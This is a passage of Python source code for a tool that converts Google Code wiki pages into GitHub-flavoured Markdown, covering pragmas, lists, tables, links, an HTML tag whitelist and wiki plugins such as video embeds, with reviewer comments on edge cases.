        "span": _BASIC_HTML_ARGS,
        "strike": _BASIC_HTML_ARGS,
        "strong": _BASIC_HTML_ARGS,
        "sub": _BASIC_HTML_ARGS,
        "sup": _BASIC_HTML_ARGS,
        "table": _BASIC_HTML_TABLE_ARGS,
        "tbody": _BASIC_HTML_TABLE_ARGS,
        "td": _BASIC_HTML_TABLE_ARGS,
        "tfoot": _BASIC_HTML_TABLE_ARGS,
        "th": _BASIC_HTML_TABLE_ARGS,
        # NOTE(review): colspan/rowspan allowed on thead/tr but not on td/th,
        # which is unusual -- confirm this matches the original wiki parser.
        "thead": _BASIC_HTML_TABLE_ARGS + ["colspan", "rowspan"],
        "tr": _BASIC_HTML_TABLE_ARGS + ["colspan", "rowspan"],
        "tt": _BASIC_HTML_ARGS,
        "u": _BASIC_HTML_ARGS,
        "ul": _BASIC_HTML_ARGS + ["type"],
        "var": _BASIC_HTML_ARGS,
    }

    # These plugins consume raw text.
    _RAW_PLUGINS = ["code", "wiki:comment", "pre"]

    # Parameters supported by the g:plusone plugin.
    _PLUSONE_ARGS = ["count", "size", "href"]

    # Parameters supported by the wiki:video plugin.
    _VIDEO_ARGS = ["url", "width", "height"]
    # Default embed dimensions (pixels, kept as strings) for wiki:video.
    _VIDEO_DEFAULT_WIDTH = "425"
    _VIDEO_DEFAULT_HEIGHT = "344"
def __init__(
        self,
        pragma_handler,
        formatting_handler,
        warning_method,
        project,
        wikipages):
    """Initializes the converter with its collaborators.

    Args:
      pragma_handler: Receives parsed pragmas.
      formatting_handler: Receives parsed formatting rules.
      warning_method: Callable used to report warning messages.
      project: Name of the Google Code project for the Wiki page.
      wikipages: Wiki pages assumed to exist, used for auto-linking.
    """
    self._pragma_handler = pragma_handler
    self._formatting_handler = formatting_handler
    self._warning_method = warning_method
    self._project = project
    self._wikipages = wikipages
def Convert(self, input_stream, output_stream):
    """Converts a file in Google Code Wiki format to Github-flavored Markdown.

    Args:
      input_stream: Input Wiki file.
      output_stream: Output Markdown file.
    """
    # For simpler processing just load the entire file into memory.
    input_lines = input_stream.readlines()
    input_line = 1  # line numbers are 1-based throughout this module
    # First extract pragmas, which must be placed at the top of the file.
    input_line = self._ExtractPragmas(input_line, input_lines, output_stream)
    # Now ignore any starting vertical whitespace.
    input_line = self._MoveToMain(input_line, input_lines, output_stream)
    # At the main text, begin processing.
    input_line = self._ProcessBody(input_line, input_lines, output_stream)
    # Done, but sanity check the amount of input processed.
    remaining_lines = len(input_lines) - input_line + 1
    if remaining_lines != 0:
        self._warning_method(
            input_line,
            u"Processing completed, but not all lines were processed. "
            "Remaining lines: {0}.".format(remaining_lines))
def _ExtractPragmas(self, input_line, input_lines, output_stream):
    """Strips leading pragma lines, forwarding each to the pragma handler.

    Args:
      input_line: Current line number being processed.
      input_lines: Input Wiki file lines.
      output_stream: Output Markdown file.

    Returns:
      The line number of the first non-pragma line.
    """
    for current in input_lines[input_line - 1:]:
        matched = constants.PRAGMA_RE.match(current)
        if matched is None:
            # No more pragmas; the body starts here.
            break
        pragma_type, pragma_value = matched.groups()
        self._pragma_handler.HandlePragma(
            input_line,
            output_stream,
            pragma_type.strip(),
            pragma_value.strip())
        input_line += 1
    return input_line
def _MoveToMain(self, input_line, input_lines, unused_output_stream):
    """Advances past blank lines to the first line of the main body.

    Args:
      input_line: Current line number being processed.
      input_lines: Input Wiki file lines.
      unused_output_stream: Output Markdown file (unused).

    Returns:
      The line number of the first non-blank line at or after input_line.
    """
    for current in input_lines[input_line - 1:]:
        if current.strip():
            break
        input_line += 1
    return input_line
def _ProcessBody(self, input_line, input_lines, output_stream):
    """The process core.

    It is a simple loop that tries to match formatting rules
    then pass it to the correct handler. It processes the matches
    in the same order as Google Code's wiki parser.

    Args:
      input_line: Current line number being processed.
      input_lines: Input Wiki file lines.
      output_stream: Output Markdown file.

    Returns:
      The new value of input_line after processing.
    """
    # State tracked during processing:
    self._code_block_depth = 0  # How many code block openings we've seen.
    self._code_block_lines = []  # What lines we've collected for a code block.
    self._indents = []  # 2-tuple of indent position and list type.
    self._open_tags = []  # List of open tags, like bold or italic.
    self._table_columns = []  # Table column sizes, taken from the header row.
    self._table_column = 0  # Current column in the table body, or zero if none.
    self._plugin_stack = []  # Current stack of plugins and their parameters.
    first_line = True
    for line in input_lines[input_line - 1:]:
        stripped_line = line.strip()
        self._ProcessLine(
            first_line,
            input_line,
            line,
            stripped_line,
            output_stream)
        # Moving on to the next line.
        input_line += 1
        first_line = False
    if self._code_block_depth:
        # Forgotten code block ending, close it implicitly.
        # NOTE(review): unlike the normal close path in _ProcessLine, this
        # does not emit HandleCodeBlockOpen first -- confirm intended.
        code = "".join(self._code_block_lines)
        self._formatting_handler.HandleText(input_line, output_stream, code)
        self._formatting_handler.HandleCodeBlockClose(input_line, output_stream)
    return input_line
def _ProcessLine(
        self,
        first_line,
        input_line,
        line,
        stripped_line,
        output_stream):
    """Processes a single line, depending on state.

    Handles, in order: code-block open/close, raw code-block content,
    empty lines (which close formatting/tables), list indentation, and
    finally inline formatting primitives.

    Args:
      first_line: True if this is the first line, false otherwise.
      input_line: Current line number being processed.
      line: The raw line string.
      stripped_line: The line string, stripped of surrounding whitespace.
      output_stream: Output Markdown file.
    """
    # Check for the start of a code block.
    if constants.START_CODEBLOCK_RE.match(stripped_line):
        if self._code_block_depth == 0:
            # Start a new collection of lines.
            self._code_block_lines = []
        else:
            # Just an embedded code block.
            self._code_block_lines.append(line)
        self._code_block_depth += 1
        return
    # Check for the end of a code block.
    if constants.END_CODEBLOCK_RE.match(stripped_line):
        self._code_block_depth -= 1
        if self._code_block_depth == 0:
            # Closed the highest-level code block, handle it.
            self._formatting_handler.HandleEscapedText(
                input_line,
                output_stream,
                "\n")
            self._formatting_handler.HandleCodeBlockOpen(
                input_line,
                output_stream,
                None)
            code = "".join(self._code_block_lines)
            self._formatting_handler.HandleText(input_line, output_stream, code)
            self._formatting_handler.HandleCodeBlockClose(input_line, output_stream)
        else:
            # Just closed an embedded code block.
            self._code_block_lines.append(line)
        return
    # Check if we're in a code block.
    # If we are, just put the raw text into code_block_lines.
    if self._code_block_depth != 0:
        self._code_block_lines.append(line)
        return
    # For empty lines, close all formatting.
    if not stripped_line:
        if not self._ConsumeTextForPlugin():
            self._SetCurrentList(input_line, 0, " ", output_stream)
            self._CloseTags(input_line, output_stream)
            if self._table_columns:
                self._formatting_handler.HandleTableClose(input_line, output_stream)
                self._table_columns = []
                self._table_column = 0
            self._formatting_handler.HandleParagraphBreak(input_line, output_stream)
        return
    # Non-empty line, finish the previous line's newline.
    if not first_line:
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            "\n")
    # Now check if we're processing within a list.
    indent_pos = constants.INDENT_RE.match(line).end()
    if (indent_pos and indent_pos < len(line) and
            not self._ConsumeTextForPlugin()):
        # Unknown list symbols fall back to blockquote handling.
        list_type = constants.LIST_TYPES.get(line[indent_pos], "blockquote")
        if self._SetCurrentList(input_line, indent_pos, list_type, output_stream):
            # Blockquotes take the entire remainder of the line,
            # but everything else skips the list symbol plus the space after.
            # (In case there is no space after, the first character is skipped;
            # we will warn if this is detected, as it was probably unintended.)
            if list_type == "blockquote":
                line = line[indent_pos:]
            else:
                if line[indent_pos + 1] != " ":
                    self._warning_method(
                        input_line,
                        u"Missing space after list symbol: {0}, "
                        "'{1}' was removed instead."
                        .format(line[indent_pos], line[indent_pos + 1]))
                line = line[indent_pos + 2:]
            stripped_line = line.strip()
    else:
        # Reset to no indent.
        self._SetCurrentList(input_line, 0, " ", output_stream)
    # Finally, split the line into formatting primitives.
    # We do so without whitespace so we can catch line breaks across tags.
    if constants.LINE_FORMAT_RE.match(stripped_line):
        self._ProcessMatch(
            input_line,
            constants.LINE_FORMAT_RE,
            stripped_line,
            output_stream)
    else:
        self._ProcessMatch(
            input_line,
            constants.TEXT_FORMAT_RE,
            stripped_line,
            output_stream)
    self._CloseTableRow(input_line, output_stream)
def _SetCurrentList(self, input_line, indent_pos, list_type, output_stream):
    """Set the current list level based on the indentation.

    Args:
      input_line: Current line number being processed.
      indent_pos: How far into the line we are indented.
      list_type: What the type of the list should be.
      output_stream: Output Markdown file.

    Returns:
      True if we are in a list item, False otherwise.
    """
    # Pop and close the lists until we hit a
    # list that is at the current position and type
    while self._indents and self._indents[-1][0] >= indent_pos:
        indents_top = self._indents[-1]
        if indents_top[0] == indent_pos and indents_top[1] == list_type:
            break
        self._formatting_handler.HandleListClose(input_line, output_stream)
        self._indents.pop()
    # If we just popped everything off, we're not in a list.
    if indent_pos == 0:
        return False
    if not self._indents or indent_pos >= self._indents[-1][0]:
        # Add a new indentation if this is the first item overall,
        # or the first item at this indentation position.
        if not self._indents or indent_pos > self._indents[-1][0]:
            self._indents.append((indent_pos, list_type))
    # Add the leading Markdown for the list.
    indentation_level = len(self._indents)
    if list_type == "numeric":
        self._formatting_handler.HandleNumericListOpen(
            input_line,
            output_stream,
            indentation_level)
    elif list_type == "bullet":
        self._formatting_handler.HandleBulletListOpen(
            input_line,
            output_stream,
            indentation_level)
    elif list_type == "blockquote":
        self._formatting_handler.HandleBlockQuoteOpen(
            input_line,
            output_stream,
            indentation_level)
    else:
        self._warning_method(
            input_line,
            u"Bad list type: '{0}'".format(list_type))
    return True
def _OpenTag(self, input_line, tag, output_stream):
    """Emits the opening form of a formatting tag and records it as open.

    Args:
      input_line: Current line number being processed.
      tag: Tag to open.
      output_stream: Output Markdown file.
    """
    open_handler = getattr(
        self._formatting_handler, u"Handle{0}Open".format(tag), None)
    if open_handler is None:
        # No handler method for this tag name: report it, but still track
        # the tag so open/close bookkeeping stays balanced.
        self._warning_method(input_line, u"Bad open tag: '{0}'".format(tag))
    else:
        open_handler(input_line, output_stream)
    self._open_tags.append(tag)
def _CloseTag(self, input_line, tag, output_stream):
    """Emits the closing form of a formatting tag and drops it from the
    open-tags list.

    Args:
      input_line: Current line number being processed.
      tag: Tag to close.
      output_stream: Output Markdown file.
    """
    close_handler = getattr(
        self._formatting_handler, u"Handle{0}Close".format(tag), None)
    if close_handler is None:
        self._warning_method(input_line, u"Bad close tag: '{0}'".format(tag))
    else:
        close_handler(input_line, output_stream)
    self._open_tags.remove(tag)
def _CloseTags(self, input_line, output_stream):
    """Close all tags.

    Args:
      input_line: Current line number being processed.
      output_stream: Output Markdown file.
    """
    # BUG FIX: _CloseTag() removes each tag from self._open_tags, so
    # iterating the live list skipped every other tag and left some tags
    # unclosed. Iterate over a snapshot instead.
    for tag in list(self._open_tags):
        self._CloseTag(input_line, tag, output_stream)
def _CloseTableRow(self, input_line, output_stream):
    """Close table row, if any.

    A _table_column of 0 means we are still in the header row; after the
    header is emitted the column counter is set to 1.

    Args:
      input_line: Current line number being processed.
      output_stream: Output Markdown file.
    """
    if self._table_columns:
        if self._table_column != 1:
            self._formatting_handler.HandleTableRowEnd(input_line, output_stream)
        # Check if we just finished the header row.
        if not self._table_column:
            self._formatting_handler.HandleTableHeader(
                input_line,
                output_stream,
                self._table_columns)
        # In a table body, set the current column to 1.
        self._table_column = 1
def _ConsumeTextForPlugin(self):
    """Reports whether the innermost open plugin swallows raw text.

    Returns:
      True if the current plugin is consuming raw text, False otherwise.
    """
    if not self._plugin_stack:
        return False
    return self._plugin_stack[-1]["id"] in self._RAW_PLUGINS
def _ProcessMatch(self, input_line, match_regex, line, output_stream):
    """Process text, using a regex to match against.

    Text between matches is emitted as regular (escaped) text; each named
    group that matched is dispatched to the corresponding _Handle<Rule>
    method.

    Args:
      input_line: Current line number being processed.
      match_regex: Regex to match the line against.
      line: The line being processed.
      output_stream: Output Markdown file.
    """
    lastpos = 0
    for fullmatch in match_regex.finditer(line):
        # Add text before the match as regular text.
        if lastpos < fullmatch.start():
            starting_line = line[lastpos:fullmatch.start()]
            if self._ConsumeTextForPlugin():
                self._formatting_handler.HandleText(
                    input_line,
                    output_stream,
                    starting_line)
            else:
                self._formatting_handler.HandleEscapedText(
                    input_line,
                    output_stream,
                    starting_line)
        for rulename, match in fullmatch.groupdict().items():
            if match is not None:
                if self._ConsumeTextForPlugin() and rulename != "PluginEnd":
                    self._formatting_handler.HandleText(
                        input_line,
                        output_stream,
                        match)
                else:
                    # Dispatch by group name to _Handle<Rule>.
                    # NOTE(review): getattr defaults to None, so a group name
                    # without a matching handler would raise TypeError on the
                    # call below -- presumably every named group in the regex
                    # has one; confirm against constants.
                    handler = getattr(self, u"_Handle{0}".format(rulename), None)
                    handler(input_line, match, output_stream)
        lastpos = fullmatch.end()
    # Add remainder of the line as regular text.
    if lastpos < len(line):
        remaining_line = line[lastpos:]
        if self._ConsumeTextForPlugin():
            self._formatting_handler.HandleText(
                input_line,
                output_stream,
                remaining_line)
        else:
            self._formatting_handler.HandleEscapedText(
                input_line,
                output_stream,
                remaining_line)
def _HandleHeading(self, input_line, match, output_stream):
    """Handle a heading formatter.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    match = match.strip()
    # Number of '=' signs on each side, computed by stripping them off.
    leftequalcount = len(match) - len(match.lstrip("="))
    rightequalcount = len(match) - len(match.rstrip("="))
    # Users often forget to have the same number of equals signs on
    # both sides. Rather than simply error out, we say the level is
    # the number of equals signs on the left side.
    header_level = leftequalcount
    # If the level is greater than 6, the header is invalid and the contents
    # are parsed as if no header markup were provided.
    if header_level > 6:
        header_level = None
    # Everything else is the heading text.
    heading_text = match[leftequalcount:-rightequalcount].strip()
    if header_level:
        self._formatting_handler.HandleHeaderOpen(
            input_line,
            output_stream,
            header_level)
    self._ProcessMatch(
        input_line,
        constants.TEXT_FORMAT_RE,
        heading_text,
        output_stream)
    if header_level:
        self._formatting_handler.HandleHeaderClose(
            input_line,
            output_stream,
            header_level)
def _HandleHRule(self, input_line, unused_match, output_stream):
    """Emits a horizontal rule.

    Args:
      input_line: Current line number being processed.
      unused_match: Matched text (ignored).
      output_stream: Output Markdown file.
    """
    self._formatting_handler.HandleHRule(input_line, output_stream)
def _HandleBold(self, input_line, unused_match, output_stream):
    """Opens or closes bold formatting via the shared tag helper.

    Args:
      input_line: Current line number being processed.
      unused_match: Matched text (ignored).
      output_stream: Output Markdown file.
    """
    self._HandleTag(input_line, "Bold", output_stream)
def _HandleItalic(self, input_line, unused_match, output_stream):
    """Opens or closes italic formatting via the shared tag helper.

    Args:
      input_line: Current line number being processed.
      unused_match: Matched text (ignored).
      output_stream: Output Markdown file.
    """
    self._HandleTag(input_line, "Italic", output_stream)
def _HandleStrikethrough(self, input_line, unused_match, output_stream):
    """Opens or closes strikethrough formatting via the shared tag helper.

    Args:
      input_line: Current line number being processed.
      unused_match: Matched text (ignored).
      output_stream: Output Markdown file.
    """
    self._HandleTag(input_line, "Strikethrough", output_stream)
def _HandleSuperscript(self, input_line, match, output_stream):
    """Forwards superscript text to the formatting handler.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    self._formatting_handler.HandleSuperscript(
        input_line, output_stream, match)
def _HandleSubscript(self, input_line, match, output_stream):
    """Forwards subscript text to the formatting handler.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    self._formatting_handler.HandleSubscript(
        input_line, output_stream, match)
def _HandleInlineCode(self, input_line, match, output_stream):
    """Forwards inline code (first syntax form) to the formatting handler.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    self._formatting_handler.HandleInlineCode(
        input_line, output_stream, match)
def _HandleInlineCode2(self, input_line, match, output_stream):
    """Forwards inline code (second syntax form) to the formatting handler.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    self._formatting_handler.HandleInlineCode(
        input_line, output_stream, match)
def _HandleTableCell(self, input_line, match, output_stream):
    """Handle a table cell.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    # Table cells end previous formatting.
    self._CloseTags(input_line, output_stream)
    # Count the pipes to calculate the column span.
    pipecount = 0
    for char in match:
        if char != "|":
            break
        pipecount += 1
    # NOTE(review): integer division under Python 2 (this module imports
    # urlparse, so it targets Python 2); under Python 3 this would yield a
    # float and the span loop below would behave differently.
    span = pipecount / 2
    # Now output the cell, tracking the size of the contents.
    self._formatting_handler.HandleTableCellBorder(input_line, output_stream)
    starting_pos = output_stream.tell()
    self._ProcessMatch(
        input_line,
        constants.TEXT_FORMAT_RE,
        match[pipecount:],
        output_stream)
    ending_pos = output_stream.tell()
    # Handle the cell width, either tracking or padding.
    cell_width = ending_pos - starting_pos
    if not self._table_column:
        # In the header row, track the column sizes.
        self._table_columns.append(cell_width)
    else:
        # In the table body, pad the cell (for prettier raw text viewing).
        colIdx = self._table_column - 1
        # Clamp: body rows may contain more cells than the header row had.
        if colIdx >= len(self._table_columns):
            colIdx = len(self._table_columns) - 1
        header_cell_width = self._table_columns[colIdx]
        remaining_width = header_cell_width - cell_width
        if remaining_width > 0:
            padding = " " * remaining_width
            self._formatting_handler.HandleEscapedText(
                input_line,
                output_stream,
                padding)
        self._table_column += 1
    if span > 1:
        self._warning_method(
            input_line,
            "Multi-span cells are not directly supported in GFM. They have been "
            "emulated by adding empty cells. This may give the correct rendered "
            "result, but the plain-text representation may be noisy. Consider "
            "removing the multi-span cells from your table, or using HTML.")
    while span > 1:
        # Empty cell.
        self._formatting_handler.HandleTableCellBorder(
            input_line,
            output_stream)
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            " ")
        self._table_columns.append(1)
        span -= 1
def _HandleTableRowEnd(self, input_line, unused_match, output_stream):
    """Finishes a table row.

    Args:
      input_line: Current line number being processed.
      unused_match: Matched text (ignored).
      output_stream: Output Markdown file.
    """
    # Row endings terminate any in-flight inline formatting first.
    self._CloseTags(input_line, output_stream)
    self._CloseTableRow(input_line, output_stream)
def _HandleUrl(self, input_line, match, output_stream):
    """Emits an auto-linked URL with no explicit description.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    self._formatting_handler.HandleLink(
        input_line, output_stream, match, None)
def _HandleUrlBracket(self, input_line, match, output_stream):
    """Handles a bracketed URL, optionally followed by a description.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    # Drop the surrounding brackets, then split "url description" once on
    # the first run of whitespace.
    core = match[1:-1]
    parts = constants.WHITESPACE_RE.split(core, 1)
    url = parts[0]
    description = parts[1] if len(parts) > 1 else None
    self._formatting_handler.HandleLink(
        input_line,
        output_stream,
        url,
        description)
def _HandleWikiWord(self, input_line, match, output_stream):
    """Handles a wiki word.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    if match[0] == "!":
        # A leading '!' escapes auto-linking; emit the word without it.
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            match[1:])
        return
    if match in self._wikipages:
        self._formatting_handler.HandleWiki(
            input_line,
            output_stream,
            match,
            None)
    else:
        # Unknown page: render as plain text rather than a dead link.
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            match)
def _HandleWikiWordBracket(self, input_line, match, output_stream):
    """Handles a bracketed wiki word, optionally with a description.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    # Drop the surrounding brackets, then split "wiki description" once on
    # the first run of whitespace.
    core = match[1:-1]
    parts = constants.WHITESPACE_RE.split(core, 1)
    wiki = parts[0]
    description = parts[1] if len(parts) > 1 else None
    self._formatting_handler.HandleWiki(
        input_line,
        output_stream,
        wiki,
        description)
def _HandleIssueLink(self, input_line, match, output_stream):
    """Handle an auto-linked issue.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    # Strip the "issue" keyword to get the numeric part.
    issue = match[len("issue"):].strip()
    # Everything before the number (keyword plus whitespace) is the prefix.
    # NOTE(review): assumes issue is non-empty; if it were empty,
    # match[:-0] would evaluate to "" -- presumably the regex guarantees
    # trailing digits.
    prefix = match[:-len(issue)]
    self._formatting_handler.HandleIssue(
        input_line,
        output_stream,
        prefix,
        issue)
def _HandleRevisionLink(self, input_line, match, output_stream):
    """Handle an auto-linked revision.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    # The link is either "revision <n>" or "r<n>"; the second character
    # distinguishes them ('e' only occurs in "revision").
    if match[1].lower() == "e":
        revision = match[len("revision"):].strip()
    else:
        revision = match[len("r"):].strip()
    # Everything before the number is the prefix.
    # NOTE(review): like _HandleIssueLink, assumes revision is non-empty.
    prefix = match[:-len(revision)]
    self._formatting_handler.HandleRevision(
        input_line,
        output_stream,
        prefix,
        revision)
def _HandlePlugin(self, input_line, match, output_stream):
    """Handle a plugin tag.

    Parses the tag into an ID plus parameters, dispatches to the specific
    plugin handler, and pushes non-self-closing plugins onto the stack.

    Args:
      input_line: Current line number being processed.
      match: Matched text.
      output_stream: Output Markdown file.
    """
    # Plugins close formatting tags.
    self._CloseTags(input_line, output_stream)
    # Get the core of the tag, check if this is also an end tag.
    if match.endswith("/>"):
        core = match[1:-2]
        has_end = True
    else:
        core = match[1:-1]
        has_end = False
    # Extract the ID for the plugin.
    plugin_id = constants.PLUGIN_ID_RE.match(core).group(0)
    core_params = core[len(plugin_id):].strip()
    # Extract the parameters for the plugin.
    params = {}
    for name, value in constants.PLUGIN_PARAM_RE.findall(core_params):
        # Remove quotes from the value, if they exist
        if value.startswith("'"):
            value = value.strip("'")
        elif value.startswith("\""):
            value = value.strip("\"")
        params[name] = value
    # Now figure out what to do with the plugin.
    if plugin_id in self._ALLOWED_HTML_TAGS:
        self._HandlePluginHtml(
            input_line,
            plugin_id,
            params,
            has_end,
            output_stream)
    elif plugin_id == "g:plusone":
        self._HandlePluginGPlus(
            input_line,
            plugin_id,
            params,
            output_stream)
    elif plugin_id == "wiki:comment":
        self._HandlePluginWikiComment(
            input_line,
            plugin_id,
            params,
            output_stream)
    elif plugin_id == "wiki:gadget":
        self._HandlePluginWikiGadget(input_line, match, output_stream)
    elif plugin_id == "wiki:video":
        self._HandlePluginWikiVideo(
            input_line,
            plugin_id,
            params,
            output_stream)
    elif plugin_id == "wiki:toc":
        self._HandlePluginWikiToc(input_line, match, output_stream)
    else:
        self._warning_method(
            input_line,
            u"Unknown plugin was given, outputting "
            "as plain text:\n\t{0}".format(match))
        # Wiki syntax put this class of error on its own line.
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            u"\n\n{0}\n\n".format(match))
    # Add plugin and parameters to the stack.
    # Note: even unrecognized plugins are pushed, so their end tag pops
    # them back off.
    if not has_end:
        plugin_info = {"id": plugin_id, "params": params}
        self._plugin_stack.append(plugin_info)
def _HandlePluginHtml(
        self,
        input_line,
        plugin_id,
        params,
        has_end,
        output_stream):
    """Handles a plugin tag that maps to a whitelisted HTML tag.

    Args:
      input_line: Current line number being processed.
      plugin_id: The plugin ID.
      params: The plugin params.
      has_end: Plugin has an end tag.
      output_stream: Output Markdown file.
    """
    # Filter the parameters for output; rejected ones still act as
    # variables, they just don't appear in the emitted HTML.
    allowed_parameters = self._ALLOWED_HTML_TAGS[plugin_id]
    filtered_params = {}
    for name, value in params.items():
        if name not in allowed_parameters:
            self._warning_method(
                input_line,
                u"The following parameter was given for the '{0}' tag, "
                "but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
                .format(plugin_id, name, value))
            continue
        filtered_params[name] = value
    if plugin_id == "code":
        # <code> becomes a fenced code block rather than raw HTML.
        self._formatting_handler.HandleCodeBlockOpen(
            input_line,
            output_stream,
            filtered_params.get("language"))
    else:
        self._formatting_handler.HandleHtmlOpen(
            input_line,
            output_stream,
            plugin_id,
            filtered_params,
            has_end)
def _HandlePluginGPlus(
    self,
    input_line,
    plugin_id,
    params,
    output_stream):
    """Handle a plugin tag for +1 button.

    Args:
        input_line: Current line number being processed.
        plugin_id: The plugin ID.
        params: The plugin params.
        output_stream: Output Markdown file.
    """
    # Keep only the parameters the +1 button actually supports.
    filtered_params = {}
    for key, val in params.items():
        if key in self._PLUSONE_ARGS:
            filtered_params[key] = val
            continue
        self._warning_method(
            input_line,
            u"The following parameter was given for the '{0}' tag, "
            "but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
            .format(plugin_id, key, val))
    self._formatting_handler.HandleGPlusOpen(
        input_line,
        output_stream,
        filtered_params)
def _HandlePluginWikiComment(
    self,
    input_line,
    plugin_id,
    params,
    output_stream):
    """Handle a plugin tag for a wiki comment.

    Args:
        input_line: Current line number being processed.
        plugin_id: The plugin ID.
        params: The plugin params.
        output_stream: Output Markdown file.
    """
    # Comments accept no parameters, so warn about every one supplied.
    for key, val in params.items():
        self._warning_method(
            input_line,
            u"The following parameter was given for the '{0}' tag, "
            "but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
            .format(plugin_id, key, val))
    self._formatting_handler.HandleCommentOpen(input_line, output_stream)
def _HandlePluginWikiGadget(self, input_line, match, output_stream):
    """Handle a plugin tag for a wiki gadget.

    Args:
        input_line: Current line number being processed.
        match: Matched text.
        output_stream: Output Markdown file.
    """
    # Gadgets have no GFM equivalent; warn and emit the raw text instead.
    warning = (u"A wiki gadget was used, but this must be manually converted to a "
               "GFM-supported method, if possible. Outputting as plain text:\n\t{0}"
               .format(match))
    self._warning_method(input_line, warning)
    self._formatting_handler.HandleEscapedText(
        input_line,
        output_stream,
        match)
def _HandlePluginWikiVideo(
    self,
    input_line,
    plugin_id,
    params,
    output_stream):
    """Handle a plugin tag for a wiki video.

    Args:
        input_line: Current line number being processed.
        plugin_id: The plugin ID.
        params: The plugin params.
        output_stream: Output Markdown file.
    """
    # Keep only the supported video parameters, warning on the rest.
    filtered_params = {}
    for key, val in params.items():
        if key in self._VIDEO_ARGS:
            filtered_params[key] = val
        else:
            self._warning_method(
                input_line,
                u"The following parameter was given for the '{0}' tag, "
                "but will not be present in the outputted HTML:\n\t'{1}': '{2}'"
                .format(plugin_id, key, val))
    if "url" not in filtered_params:
        # No URL at all: emit the same inline error the wiki produced.
        output = "wiki:video: missing mandatory parameter \"url\"."
        self._warning_method(
            input_line,
            u"Video plugin is missing 'url' parameter, outputting error:\n\t{0}"
            .format(output))
        # Wiki syntax put this class of error on its own line.
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            u"\n\n{0}\n\n".format(output))
        return
    width = filtered_params.get("width", self._VIDEO_DEFAULT_WIDTH)
    height = filtered_params.get("height", self._VIDEO_DEFAULT_HEIGHT)
    # Accept both "?v=<id>" query URLs and "/v/<id>" path URLs.
    parsed_url = urlparse.urlparse(filtered_params["url"])
    query = urlparse.parse_qs(parsed_url.query)
    video_id = query.get("v", [""])[0]
    if not video_id and parsed_url.path.startswith("/v/"):
        video_id = parsed_url.path[3:]
    if constants.YOUTUBE_VIDEO_ID_RE.match(video_id):
        self._formatting_handler.HandleVideoOpen(
            input_line,
            output_stream,
            video_id,
            width,
            height)
    else:
        output = ("wiki:video: cannot find YouTube "
                  "video id within parameter \"url\".")
        self._warning_method(
            input_line,
            u"Video plugin has invalid video ID, outputting error:\n\t{0}"
            .format(output))
        # Wiki syntax put this class of error on its own line.
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            u"\n\n{0}\n\n".format(output))
def _HandlePluginWikiToc(self, input_line, match, output_stream):
    """Handle a plugin tag for a wiki table of contents.

    Args:
        input_line: Current line number being processed.
        match: Matched text.
        output_stream: Output Markdown file.
    """
    # Gollum generates its own TOC, so the plugin is dropped with a notice.
    warning = (u"A table of contents plugin was used for this wiki:\n"
               "\t{0}\n"
               "The Gollum wiki system supports table of content generation.\n"
               "See https://github.com/gollum/gollum/wiki for more information.\n"
               "It has been removed."
               .format(match))
    self._warning_method(input_line, warning)
def _HandlePluginEnd(self, input_line, match, output_stream):
    """Handle a plugin ending tag.

    Args:
        input_line: Current line number being processed.
        match: Matched text.
        output_stream: Output Markdown file.
    """
    # Strip the surrounding "</" and ">" to isolate the plugin name.
    core = match[2:-1]
    plugin_id = constants.PLUGIN_ID_RE.match(core).group(0)
    # Only honour the end tag when it closes the innermost open plugin.
    if self._plugin_stack and self._plugin_stack[-1]["id"] == plugin_id:
        self._plugin_stack.pop()
        if plugin_id in self._ALLOWED_HTML_TAGS:
            if plugin_id == "code":
                self._formatting_handler.HandleCodeBlockClose(
                    input_line,
                    output_stream)
            else:
                self._formatting_handler.HandleHtmlClose(
                    input_line,
                    output_stream,
                    plugin_id)
        elif plugin_id == "g:plusone":
            self._formatting_handler.HandleGPlusClose(input_line, output_stream)
        elif plugin_id == "wiki:comment":
            self._formatting_handler.HandleCommentClose(input_line, output_stream)
        elif plugin_id == "wiki:gadget":
            # A warning was already issued on the opening tag.
            self._formatting_handler.HandleEscapedText(
                input_line,
                output_stream,
                match)
        elif plugin_id == "wiki:video":
            self._formatting_handler.HandleVideoClose(input_line, output_stream)
        elif plugin_id == "wiki:toc":
            # A warning was already issued on the opening tag.
            pass
        else:
            # Matched the stack but isn't a recognized plugin kind.
            self._warning_method(
                input_line,
                u"Unknown but matching plugin end was given, outputting "
                "as plain text:\n\t{0}".format(match))
            # Wiki syntax put this class of error on its own line.
            self._formatting_handler.HandleEscapedText(
                input_line,
                output_stream,
                u"\n\n{0}\n\n".format(match))
    else:
        # End tag without a matching open plugin on the stack.
        self._warning_method(
            input_line,
            u"Unknown/unmatched plugin end was given, outputting "
            "as plain text with errors:\n\t{0}".format(match))
        # Wiki syntax put this class of error on its own line,
        # with a prefix error message, and did not display the tag namespace.
        tag_without_ns = plugin_id.split(":", 1)[-1]
        self._formatting_handler.HandleEscapedText(
            input_line,
            output_stream,
            u"\n\nUnknown end tag for </{0}>\n\n".format(tag_without_ns))
